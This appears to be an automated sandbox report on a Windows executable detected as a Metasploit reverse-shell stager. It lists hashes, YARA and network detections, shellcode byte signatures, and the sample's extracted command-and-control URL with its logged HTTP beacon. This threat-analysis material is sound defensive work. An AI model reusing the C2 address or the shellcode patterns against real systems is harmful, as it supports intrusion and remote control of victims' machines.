Edit tour

Windows Analysis Report
te13.exe

Overview

General Information

Sample name:	te13.exe
Analysis ID:	1585319
MD5:	7a2c49cbec37b52a946c0131fe4cd308
SHA1:	1aedf1516160023ffaebec2e0288386af5c91a1b
SHA256:	6d890c662047b30e7e5003daa3b6db782c40671b98a046a03828e61382f5c73e
Tags:	Backdoorexemalwaremetasploitrozenauser-Joker
Infos:

Detection

Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Metasploit Payload

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Entry point lies outside standard sections

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sigma detected: Communication To Uncommon Destination Ports

Suricata IDS alerts with low severity for network traffic

Yara signature match

Classification

Process Tree

System is w10x64

te13.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\te13.exe" MD5: 7A2C49CBEC37B52A946C0131FE4CD308)

WerFault.exe (PID: 3696 cmdline: C:\Windows\system32\WerFault.exe -u -p 5448 -s 1132 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Connect", "URL": "http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
te13.exe	JoeSecurity_MetasploitPayload_2	Yara detected Metasploit Payload	Joe Security
te13.exe	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
te13.exe	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x1811:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
te13.exe	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
te13.exe	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.te13.exe.140000000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x1659:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
0.2.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
0.2.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
0.0.te13.exe.140000000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.0.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x1659:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
0.0.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_0f5a852d	Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.	unknown	0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
0.0.te13.exe.140000000.0.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 104.21.16.1, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\te13.exe, Initiated: true, ProcessId: 5448, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T14:12:56.853961+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	104.21.16.1	8080	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: te13.exe

Avira: detected

Found malware configuration

Source: te13.exe

Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid"}

Multi AV Scanner detection for submitted file

Source: te13.exe

ReversingLabs: Detection: 89%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: te13.exe

Joe Sandbox ML: detected

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 104.21.16.1:8080

Source: global traffic

HTTP traffic detected: GET /softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q_kJwC-7298sgwHxYzJIFi4J69iRGiDGCWYBXhDy4V3Q1PpsBVyHnnrQQO2HvS9YmK5IXAah-f3U0wsvMwb22THyduSWTr83RlCRF2pxtARUPlsxkv1xGslk6TUZZ6CuLPdePE_3WyeDnid HTTP/1.1Host: softwareshop.win:8080Cache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 104.21.16.1:8080

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: softwareshop.win

Source: te13.exe, 00000000.00000002.1817115478.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareshop.win:8080/softwaresupport_te13/CZzbhEDNWAUwODE6Vw5_AwDdGU9BdUtaSSDbEU7hSesrtBCr7q
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: te13.exe, type: SAMPLE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: te13.exe, type: SAMPLE	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: te13.exe, type: SAMPLE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Source: C:\Users\user\Desktop\te13.exe

Code function: 0_2_000000014000416A

0_2_000000014000416A

Source: C:\Users\user\Desktop\te13.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5448 -s 1132

Source: te13.exe, type: SAMPLE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: te13.exe, type: SAMPLE	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: te13.exe, type: SAMPLE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 0.2.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 0.0.te13.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000000.00000002.1818119914.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Source: 00000000.00000000.1660597941.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.winEXE@2/5@1/1

Source: C:\Windows\System32\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5448

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2c567576-aeb0-4302-ae2c-0584c67b2cf3

Jump to behavior

Source: C:\Users\user\Desktop\te13.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: te13.exe

ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Users\user\Desktop\te13.exe "C:\Users\user\Desktop\te13.exe"
Source: C:\Users\user\Desktop\te13.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5448 -s 1132

Source: C:\Users\user\Desktop\te13.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\te13.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\te13.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: te13.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: initial sample

Static PE information: section where entry point is pointing to: .agvr

Source: te13.exe

Static PE information: real checksum: 0xe59c should be: 0xe754

Source: te13.exe

Static PE information: section name: .agvr

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
